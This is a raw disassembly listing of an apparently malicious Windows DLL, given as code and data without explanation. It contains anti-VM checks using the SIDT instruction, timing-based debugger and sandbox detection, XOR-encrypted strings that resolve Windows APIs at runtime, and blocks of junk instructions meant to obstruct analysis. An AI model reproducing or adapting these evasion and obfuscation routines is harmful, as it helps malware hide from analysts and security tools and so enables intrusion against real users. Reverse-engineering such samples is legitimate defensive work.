loc_10003654: ; DATA XREF: sub_100031E0+425�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10003676
loc_10003661: ; CODE XREF: sub_100031E0+494�j
lea eax, [ebp+var_C]
mov edx, 2
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_1000366F: ; DATA XREF: sub_100031E0+25�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10003661
; ---------------------------------------------------------------------------
loc_10003676: ; CODE XREF: sub_100031E0+48E�j
; DATA XREF: sub_100031E0+47C�o
mov al, [ebp+var_D]
mov esp, ebp
pop ebp
retn 4
sub_100031E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003680 proc near ; CODE XREF: sub_100036EC+D3�p
; sub_100036EC+105�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_10001854
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
call sub_10001AB4
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_18], eax
cmp [ebp+var_10], 0
jz short loc_100036E5
loc_100036B6: ; CODE XREF: sub_10003680+63�j
mov eax, [ebp+var_14]
mov al, [eax]
mov [ebp+var_9], al
cmp [ebp+var_9], 41h
jb short loc_100036CE
cmp [ebp+var_9], 5Ah
ja short loc_100036CE
add [ebp+var_9], 20h
loc_100036CE: ; CODE XREF: sub_10003680+42�j
; sub_10003680+48�j
mov eax, [ebp+var_18]
mov dl, [ebp+var_9]
mov [eax], dl
inc [ebp+var_14]
inc [ebp+var_18]
dec [ebp+var_10]
cmp [ebp+var_10], 0
jnz short loc_100036B6
loc_100036E5: ; CODE XREF: sub_10003680+34�j
mov esp, ebp
pop ebp
retn
sub_10003680 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100036EC proc near ; CODE XREF: CODE:100068B2�p
; CODE:100068C6�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
xor edx, edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_18], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_10003844
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_100016D8
lea eax, [ebp+var_8]
push eax
push 2000000h
push 0
lea ecx, [ebp+var_18]
mov edx, 20200437h
mov eax, offset dword_10003858
call sub_100022B8
mov eax, [ebp+var_18]
call sub_100019D8
push eax
push 80000000h
call ds:dword_10008838
test eax, eax
jnz loc_10003829
lea eax, [ebp+var_14]
push eax
push 0
lea eax, [ebp+var_10]
push eax
push 0
push offset dword_10003870
mov eax, [ebp+var_8]
push eax
call ds:dword_1000883C
test eax, eax
jnz loc_1000381F
mov eax, [ebp+var_14]
call sub_100010F0
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
push 0
push offset dword_10003870
mov eax, [ebp+var_8]
push eax
call ds:dword_1000883C
test eax, eax
jnz short loc_100037A9
mov eax, [ebp+var_4]
mov edx, [ebp+var_C]
call sub_1000180C
loc_100037A9: ; CODE XREF: sub_100036EC+B0�j
mov eax, [ebp+var_4]
mov eax, [eax]
cmp byte ptr [eax], 22h
jnz short loc_100037E5
mov eax, [ebp+var_4]
push eax
lea edx, [ebp+var_1C]
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_10003680
mov edx, [ebp+var_1C]
mov eax, offset dword_1000387C
call sub_10001A6C
mov ecx, eax
inc ecx
mov eax, [ebp+var_4]
mov eax, [eax]
mov edx, 2
call sub_10001A2C
jmp short loc_10003817
; ---------------------------------------------------------------------------
loc_100037E5: ; CODE XREF: sub_100036EC+C5�j
mov eax, [ebp+var_4]
push eax
lea edx, [ebp+var_20]
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_10003680
mov edx, [ebp+var_20]
mov eax, offset dword_1000387C
call sub_10001A6C
mov ecx, eax
add ecx, 2
mov eax, [ebp+var_4]
mov eax, [eax]
mov edx, 1
call sub_10001A2C
loc_10003817: ; CODE XREF: sub_100036EC+F7�j
mov eax, [ebp+var_C]
call sub_10001108
loc_1000381F: ; CODE XREF: sub_100036EC+80�j
mov eax, [ebp+var_8]
push eax
call ds:dword_10008840
loc_10003829: ; CODE XREF: sub_100036EC+5D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000384B
loc_10003836: ; CODE XREF: sub_100036EC+15D�j
lea eax, [ebp+var_20]
mov edx, 3
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10003844: ; DATA XREF: sub_100036EC+17�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10003836
; ---------------------------------------------------------------------------
loc_1000384B: ; CODE XREF: sub_100036EC+157�j
; DATA XREF: sub_100036EC+145�o
mov esp, ebp
pop ebp
retn
sub_100036EC endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 17h
dword_10003858 dd 6A6D6C7Fh, 5B554F67h, 2D1D2C53h, 1A2B2133h, 27242724h
; DATA XREF: sub_100036EC+3D�o
dd 29222Ah
dword_10003870 dd 0 ; sub_100036EC+9F�o
dd 0FFFFFFFFh, 3
dword_1000387C dd 657865h ; sub_100036EC+10D�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003880 proc near ; CODE XREF: CODE:10005F19�p
; CODE:100060CC�p ...
var_7 = byte ptr -7
var_6 = byte ptr -6
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
sidt fword ptr [ebp+var_6]
mov al, [ebp+var_6+5]
sub al, 0E8h
jz short loc_10003895
sub al, 17h
jnz short loc_1000389B
loc_10003895: ; CODE XREF: sub_10003880+F�j
mov [ebp+var_7], 1
jmp short loc_1000389F
; ---------------------------------------------------------------------------
loc_1000389B: ; CODE XREF: sub_10003880+13�j
mov [ebp+var_7], 0
loc_1000389F: ; CODE XREF: sub_10003880+19�j
mov al, [ebp+var_7]
pop ecx
pop ecx
pop ebp
retn
sub_10003880 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100038A8 proc near ; CODE XREF: sub_100038B8+8�p
; sub_100038B8+14�p ...
var_8 = byte ptr -8
sub esp, 8
sidt fword ptr [esp+8+var_8]
mov eax, dword ptr [esp+8+var_8+2]
add esp, 8
retn
sub_100038A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100038B8 proc near ; CODE XREF: CODE:10005F22�p
; CODE:100060D9�p ...
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
mov [ebp+var_1], 0
call sub_100038A8
cmp eax, 0ED233000h
jz short loc_100038E4
call sub_100038A8
cmp eax, 0F880F130h
jz short loc_100038E4
call sub_100038A8
cmp eax, 0FFC18000h
jnz short loc_100038E8
loc_100038E4: ; CODE XREF: sub_100038B8+12�j
; sub_100038B8+1E�j
mov [ebp+var_1], 1
loc_100038E8: ; CODE XREF: sub_100038B8+2A�j
mov al, [ebp+var_1]
pop ecx
pop ebp
retn
sub_100038B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100038F0 proc near ; CODE XREF: CODE:10005CF7�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
mov ecx, 11h
loc_100038F8: ; CODE XREF: sub_100038F0+D�j
push 0
push 0
dec ecx
jnz short loc_100038F8
xor eax, eax
push ebp
push offset loc_100041B4
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_18]
mov edx, 20200437h
mov eax, offset dword_100041CC
call sub_100022B8
mov eax, [ebp+var_18]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:hModule, eax
lea ecx, [ebp+var_1C]
mov edx, 20200437h
mov eax, offset dword_100041E4
call sub_100022B8
mov eax, [ebp+var_1C]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:dword_100087E4, eax
lea ecx, [ebp+var_20]
mov edx, 20200437h
mov eax, offset dword_100041F8
call sub_100022B8
mov eax, [ebp+var_20]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:dword_100087E8, eax
lea ecx, [ebp+var_24]
mov edx, 20200437h
mov eax, offset dword_10004210
call sub_100022B8
mov eax, [ebp+var_24]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:dword_100087EC, eax
lea ecx, [ebp+var_28]
mov edx, 20200437h
mov eax, offset dword_10004224
call sub_100022B8
mov eax, [ebp+var_28]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:dword_100087F0, eax
lea ecx, [ebp+var_2C]
mov edx, 20200437h
mov eax, offset dword_10004238
call sub_100022B8
mov eax, [ebp+var_2C]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ds:dword_100087F4, eax
lea ecx, [ebp+var_30]
mov edx, 20200437h
mov eax, offset dword_1000424C
call sub_100022B8
mov eax, [ebp+var_30]
call sub_100019D8
push eax ; lpProcName
mov eax, ds:hModule
push eax ; hModule
call GetProcAddress ; GetProcAddress
mov ds:dword_100087F8, eax
lea ecx, [ebp+var_34]
mov edx, 20200437h
mov eax, offset dword_10004264
call sub_100022B8
mov eax, [ebp+var_34]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_14], eax
lea ecx, [ebp+var_38]
mov edx, 20200437h
mov eax, offset dword_1000427C
call sub_100022B8
mov eax, [ebp+var_38]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008848, eax
lea ecx, [ebp+var_3C]
mov edx, 20200437h
mov eax, offset dword_1000428C
call sub_100022B8
mov eax, [ebp+var_3C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_100087FC, eax
lea ecx, [ebp+var_40]
mov edx, 20200437h
mov eax, offset dword_100042A4
call sub_100022B8
mov eax, [ebp+var_40]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008800, eax
lea ecx, [ebp+var_44]
mov edx, 20200437h
mov eax, offset dword_100042C0
call sub_100022B8
mov eax, [ebp+var_44]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008804, eax
lea ecx, [ebp+var_48]
mov edx, 20200437h
mov eax, offset dword_100042DC
call sub_100022B8
mov eax, [ebp+var_48]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008808, eax
lea ecx, [ebp+var_4C]
mov edx, 20200437h
mov eax, offset dword_100042F8
call sub_100022B8
mov eax, [ebp+var_4C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_1000880C, eax
lea ecx, [ebp+var_50]
mov edx, 20200437h
mov eax, offset dword_10004314
call sub_100022B8
mov eax, [ebp+var_50]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008810, eax
lea ecx, [ebp+var_54]
mov edx, 20200437h
mov eax, offset dword_1000432C
call sub_100022B8
mov eax, [ebp+var_54]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008814, eax
lea ecx, [ebp+var_58]
mov edx, 20200437h
mov eax, offset dword_10004344
call sub_100022B8
mov eax, [ebp+var_58]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008818, eax
lea ecx, [ebp+var_5C]
mov edx, 20200437h
mov eax, offset dword_10004358
call sub_100022B8
mov eax, [ebp+var_5C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_1000881C, eax
lea ecx, [ebp+var_60]
mov edx, 20200437h
mov eax, offset dword_1000437C
call sub_100022B8
mov eax, [ebp+var_60]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008820, eax
lea ecx, [ebp+var_64]
mov edx, 20200437h
mov eax, offset dword_10004390
call sub_100022B8
mov eax, [ebp+var_64]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008824, eax
lea ecx, [ebp+var_68]
mov edx, 20200437h
mov eax, offset dword_100043A8
call sub_100022B8
mov eax, [ebp+var_68]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008828, eax
lea ecx, [ebp+var_6C]
mov edx, 20200437h
mov eax, offset dword_100043C0
call sub_100022B8
mov eax, [ebp+var_6C]
call sub_100019D8
push eax
mov eax, ds:dword_100087EC
push eax
call ds:dword_100087F8
mov ds:dword_1000882C, eax
lea ecx, [ebp+var_70]
mov edx, 20200437h
mov eax, offset dword_100043E0
call sub_100022B8
mov eax, [ebp+var_70]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008830, eax
lea ecx, [ebp+var_74]
mov edx, 20200437h
mov eax, offset dword_100043FC
call sub_100022B8
mov eax, [ebp+var_74]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_10008834, eax
lea ecx, [ebp+var_78]
mov edx, 20200437h
mov eax, offset dword_10004410
call sub_100022B8
mov eax, [ebp+var_78]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov ds:dword_10008838, eax
lea ecx, [ebp+var_7C]
mov edx, 20200437h
mov eax, offset dword_10004428
call sub_100022B8
mov eax, [ebp+var_7C]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov ds:dword_1000883C, eax
lea ecx, [ebp+var_80]
mov edx, 20200437h
mov eax, offset dword_10004444
call sub_100022B8
mov eax, [ebp+var_80]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov ds:dword_10008840, eax
lea ecx, [ebp+var_84]
mov edx, 20200437h
mov eax, offset dword_10004458
call sub_100022B8
mov eax, [ebp+var_84]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_100087B4, eax
pusha
add edx, 4Eh
mov edx, 0DBh
mov ebx, edx
dec edx
add ebx, 60h
mov eax, ecx
sub eax, 28h
nop
ror eax, 0B5h
dec esi
nop
rol edx, 30h
nop
xor ecx, 97h
nop
nop
popa
pusha
mov esi, eax
sub edi, 0D1h
nop
xor eax, edx
add eax, 36h
mov edi, ebx
xor edi, ecx
xor ebx, 0DCh
ror edi, 0F1h
xor edx, 32h
add ebx, 47h
mov eax, edx
mov ebx, edx
dec ebx
ror edi, 8
xor edx, eax
sub esi, 27h
dec ecx
xor eax, ecx
add eax, 9
nop
nop
dec eax
nop
mov esi, eax
inc esi
nop
dec esi
mov ebx, esi
inc ecx
popa
pusha
sub edi, 9Dh
ror edi, 55h
nop
rol eax, 33h
nop
nop
xor eax, 43h
xor edi, 52h
xor edx, eax
xor esi, eax
rol esi, 0A7h
mov esi, eax
mov esi, eax
dec edi
nop
dec edx
dec ecx
nop
nop
sub ebx, 5Bh
nop
add eax, 96h
inc esi
mov ecx, edi
dec edx
ror eax, 10h
dec edi
nop
xor esi, ebx
inc esi
rol ecx, 2
xor ebx, edx
dec ebx
mov edi, ebx
sub edi, 45h
add edx, 2Fh
dec ecx
ror edi, 0DCh
mov esi, 0F1h
rol ecx, 6
nop
mov ebx, 98h
xor eax, 82h
ror edi, 91h
popa
lea ecx, [ebp+var_88]
mov edx, 20200437h
mov eax, offset dword_10004474
call sub_100022B8
mov eax, [ebp+var_88]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov ds:dword_10008844, eax
mov [ebp+var_1], 0
call [ebp+var_14]
mov [ebp+var_8], eax
push 64h
call ds:dword_10008848
pusha
mov ebx, 60h
sub ebx, 6Fh
add edi, 0B0h
xor esi, 0EBh
sub edx, 7Dh
add edx, 8Dh
mov ebx, 4Bh
xor ebx, edx
ror ebx, 12h
mov edi, 53h
xor edx, eax
xor eax, ecx
mov eax, 0F3h
dec esi
xor ecx, edi
dec edx
mov ebx, esi
rol ecx, 0EFh
xor edx, eax
add esi, 0ABh
add edx, 3Eh
mov ecx, 0FCh
xor ebx, edx
rol ebx, 98h
dec eax
xor esi, 6Bh
ror edx, 29h
inc edx
xor eax, edx
ror ebx, 0DAh
mov edi, 1Ah
xor edx, eax
inc esi
rol ebx, 29h
nop
mov eax, 0E6h
mov edi, 0A4h
xor esi, eax
inc esi
mov ecx, esi
inc ecx
rol eax, 0FDh
mov esi, ebx
sub ecx, 0Bh
mov eax, edx
dec ebx
rol esi, 19h
rol edx, 2
add ebx, 17h
popa
pusha
xor edx, 75h
ror ecx, 0B0h
dec ebx
mov edi, ebx
xor eax, 0DEh
add eax, 97h
nop
nop
add ecx, 9Bh
nop
dec ebx
xor edi, ecx
sub ebx, 0C4h
nop
rol edx, 71h
add esi, 4Fh
nop
nop
mov eax, 7Fh
add eax, 0E0h
dec eax
inc esi
xor ecx, edi
sub edx, 0A0h
mov ecx, edi
nop
inc edx
sub edx, 72h
dec ecx
xor eax, ecx
rol eax, 0FDh
dec esi
xor ecx, esi
mov ecx, esi
xor ecx, edi
mov ecx, 24h
sub ebx, 0Eh
dec eax
inc edx
mov ebx, 0FCh
xor eax, 0E5h
ror esi, 0FAh
xor ecx, 0Fh
xor edx, edi
sub esi, 0F7h
ror ecx, 0E1h
popa
pusha
nop
nop
ror edx, 47h
inc ebx
nop
mov ebx, 4Fh
inc ebx
xor ebx, esi
sub edx, 41h
nop
nop
xor ebx, 0Fh
mov ebx, edi
sub edi, 0EBh
inc edi
inc edi
sub esi, 0E9h
dec edi
add edi, 28h
mov eax, esi
inc edx
dec ecx
ror ecx, 4Fh
ror ecx, 85h
dec ecx
sub ecx, 0F5h
xor ecx, edi
inc edi
nop
xor edi, ecx
add ecx, 0E0h
rol edx, 93h
nop
mov edi, edx
sub ecx, 0BBh
popa
call [ebp+var_14]
mov [ebp+var_C], eax
push 64h
call ds:dword_10008848
call [ebp+var_14]
mov [ebp+var_10], eax
pusha
rol edi, 0E3h
add edi, 6Fh
mov edi, 0A5h
nop
ror ebx, 0
mov edi, ecx
sub eax, 0C8h
nop
nop
mov ebx, esi
nop
sub edx, 7Fh
add ebx, 68h
inc eax
ror esi, 92h
mov edx, 50h
xor ebx, edx
xor ecx, edi
mov edx, 0F6h
dec ebx
sub edi, 78h
dec esi
xor ecx, esi
mov ecx, esi
add ecx, 0Dh
inc ebx
xor esi, 0BAh
mov esi, 88h
xor ecx, edi
rol edx, 0FEh
nop
mov ebx, 91h
xor eax, ecx
add eax, 32h
dec esi
ror ecx, 0Bh
nop
xor eax, 0C9h
popa
pusha
rol esi, 0C5h
xor esi, 52h
xor ecx, edi
xor esi, ebx
xor edi, ebx
xor edi, ecx
xor ecx, 7Eh
dec esi
rol ecx, 0C2h
rol eax, 80h
nop
mov ecx, esi
add ecx, 3Dh
mov eax, 7Dh
xor esi, ebx
rol eax, 1Ah
dec edi
ror ecx, 18h
nop
sub ecx, 28h
inc ebx
mov eax, 0C9h
add ebx, 2Ah
dec eax
rol esi, 7Bh
ror edx, 0B6h
dec ecx
xor ecx, 0D4h
sub ebx, 0BEh
popa
pusha
xor ebx, 47h
mov edx, ebx
xor eax, edx
sub esi, 0ECh
ror esi, 78h
nop
xor eax, ecx
sub esi, 0BFh
xor edx, edi
nop
sub esi, 0ACh
nop
rol ecx, 0D1h
nop
xor ebx, edx
rol ebx, 6Dh
inc eax
nop
rol eax, 8Ch
add ebx, 0C1h
nop
inc edi
rol ebx, 3Ch
rol ebx, 9Dh
add ebx, 0FEh
dec ecx
rol ebx, 9Ah
sub edi, 3Ch
mov esi, 0F9h
xor edx, edi
xor esi, 6Ah
nop
mov edx, 0D1h
mov ebx, esi
mov ecx, 0C4h
add ecx, 7Ch
nop
inc ecx
mov ebx, 0EDh
rol ecx, 4Eh
add ecx, 0DAh
mov ebx, 93h
xor ebx, 4Bh
sub edx, 4Fh
popa
mov eax, [ebp+var_C]
sub eax, [ebp+var_8]
cmp eax, 32h
jge short loc_10004196
mov eax, [ebp+var_10]
sub eax, [ebp+var_8]
cmp eax, 96h
jge short loc_10004196
mov [ebp+var_1], 1
loc_10004196: ; CODE XREF: sub_100038F0+893�j
; sub_100038F0+8A0�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100041BB
loc_100041A3: ; CODE XREF: sub_100038F0+8C9�j
lea eax, [ebp+var_88]
mov edx, 1Dh
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_100041B4: ; DATA XREF: sub_100038F0+12�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100041A3
; ---------------------------------------------------------------------------
loc_100041BB: ; CODE XREF: sub_100038F0+8C3�j
; DATA XREF: sub_100038F0+8AE�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_100038F0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Ch
dword_100041CC dd 544B5D5Ch, 0C0E505Eh, 2E2D2411h, 0 dd 0FFFFFFFFh, 9
dword_100041E4 dd 565D4C59h, 52591257h, 53h, 0FFFFFFFFh, 0Chdword_100041F8 dd 5B4F5C56h, 0C0E554Bh, 2E2D2411h, 0 dd 0FFFFFFFFh, 9
dword_10004210 dd 6A786B67h, 52591272h, 53h, 0FFFFFFFFh, 0Ahdword_10004224 dd 485C4B42h, 5A130E08h, 2C53h, 0FFFFFFFFh, 0Bh
; DATA XREF: sub_100038F0+B9�o
dword_10004238 dd 565C5044h, 100F0F57h, 2D2C5Bh, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_100038F0+DE�o
dword_1000424C dd 6A4D5D70h, 7F5E5349h, 2733245Bh, 3730h, 0FFFFFFFFh
; DATA XREF: sub_100038F0+103�o
dd 0Ch
dword_10004264 dd 6E4D5D70h, 7D565F52h, 362F3550h, 0 dd 0FFFFFFFFh, 5
dword_1000427C dd 5F5C5464h, 4Bh, 0FFFFFFFFh, 0Ehdword_1000428C dd 5B5C4A74h, 4C6D594Fh, 31242350h, 530h, 0FFFFFFFFh, 10h
; DATA XREF: sub_100038F0+184�o
dword_100042A4 dd 6E4D5D70h, 5F584E53h, 2C2E035Bh, 323D2137h, 0
; DATA XREF: sub_100038F0+1B0�o
dd 0FFFFFFFFh, 11h
dword_100042C0 dd 5E585D65h, 5D524E6Bh, 0F32335Ah, 342A2926h, 3Eh, 0FFFFFFFFh
; DATA XREF: sub_100038F0+1DC�o
dd 12h
dword_100042DC dd 4E504A60h, 514F6C5Eh, 3132255Ch, 2928210Eh, 3135h, 0FFFFFFFFh
; DATA XREF: sub_100038F0+208�o
dd 10h
dword_100042F8 dd 6E4D5D64h, 5F584E53h, 2C2E035Bh, 323D2137h, 0
; DATA XREF: sub_100038F0+234�o
dd 0FFFFFFFFh, 0Ch
dword_10004314 dd 4F4A5D65h, 56695956h, 2620254Dh, 0 dd 0FFFFFFFFh, 0Eh
dword_1000432C dd 4E4B5161h, 7F515D4Eh, 212E2C53h, 3C06h, 0FFFFFFFFh
; DATA XREF: sub_100038F0+28C�o
dd 0Bh
dword_10004344 dd 49565474h, 505C745Eh, 242C5Bh, 0FFFFFFFFh, 18h
; DATA XREF: sub_100038F0+2B8�o
dword_10004358 dd 5B5C4A74h, 5169594Fh, 27292C50h, 7476342Fh, 3A282614h
; DATA XREF: sub_100038F0+2E4�o
dd 3A222438h, 0
dd 0FFFFFFFFh, 0Bh
dword_1000437C dd 545C4878h, 5D524E6Bh, 32335Ah, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_100038F0+310�o
dword_10004390 dd 59564A67h, 0D4E4F5Eh, 3028060Dh, 3030h, 0FFFFFFFFh
; DATA XREF: sub_100038F0+33C�o
dd 0Dh
dword_100043A8 dd 59564A67h, 0D4E4F5Eh, 3A240E0Dh, 37h, 0FFFFFFFFh, 14h
; DATA XREF: sub_100038F0+368�o
dword_100043C0 dd 774D5D70h, 52485854h, 2E28065Ah, 2B240A26h, 0B310D22h
; DATA XREF: sub_100038F0+394�o
dd 0
dd 0FFFFFFFFh, 13h
dword_100043E0 dd 794D5D70h, 5B4F4E4Eh, 30113451h, 3520272Ch, 2D0134h
; DATA XREF: sub_100038F0+3C0�o
dd 0FFFFFFFFh, 0Bh
dword_100043FC dd 4E504072h, 5D524E6Bh, 32335Ah, 0FFFFFFFFh, 0Dh
; DATA XREF: sub_100038F0+3EC�o
dword_10004410 dd 755E5D65h, 7553594Bh, 3A04395Ah, 2, 0FFFFFFFFh, 10h
; DATA XREF: sub_100038F0+418�o
dword_10004428 dd 6B5E5D65h, 474F594Eh, 372D2169h, 73D0126h, 0
; DATA XREF: sub_100038F0+444�o
dd 0FFFFFFFFh, 0Bh
dword_10004444 dd 795E5D65h, 5B4E5357h, 382574h, 0FFFFFFFFh, 10h
; DATA XREF: sub_100038F0+470�o
dword_10004458 dd 574B5D63h, 4A5C5252h, 2D33105Ah, 35362120h, 0
; DATA XREF: sub_100038F0+49F�o
dd 0FFFFFFFFh, 0Fh
dword_10004474 dd 5B5C4A74h, 576A594Fh, 352E2451h, 43C06h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004484 proc near ; CODE XREF: sub_10004540+9A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
xor edx, edx
mov [ebp+var_14], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_10004514
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_14]
mov edx, 20200437h
mov eax, offset dword_1000452C
call sub_100022B8
mov eax, [ebp+var_14]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
call sub_100019D8
push eax
call [ebp+var_10]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_100044ED
test byte ptr [ebp+var_C], 10h
jnz short loc_100044F1
loc_100044ED: ; CODE XREF: sub_10004484+61�j
xor eax, eax
jmp short loc_100044F3
; ---------------------------------------------------------------------------
loc_100044F1: ; CODE XREF: sub_10004484+67�j
mov al, 1
loc_100044F3: ; CODE XREF: sub_10004484+6B�j
mov [ebp+var_5], al
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000451B
loc_10004503: ; CODE XREF: sub_10004484+95�j
lea eax, [ebp+var_14]
call sub_100016D8
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_10004514: ; DATA XREF: sub_10004484+19�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10004503
; ---------------------------------------------------------------------------
loc_1000451B: ; CODE XREF: sub_10004484+8F�j
; DATA XREF: sub_10004484+7A�o
mov al, [ebp+var_5]
mov esp, ebp
pop ebp
retn
sub_10004484 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 12h
dword_1000452C dd 7C4D5D70h, 7F585052h, 2B33344Bh, 23313121h, 934h
; DATA XREF: sub_10004484+2C�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004540 proc near ; CODE XREF: CODE:loc_10005D08�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
xor eax, eax
mov [ebp+var_20], eax
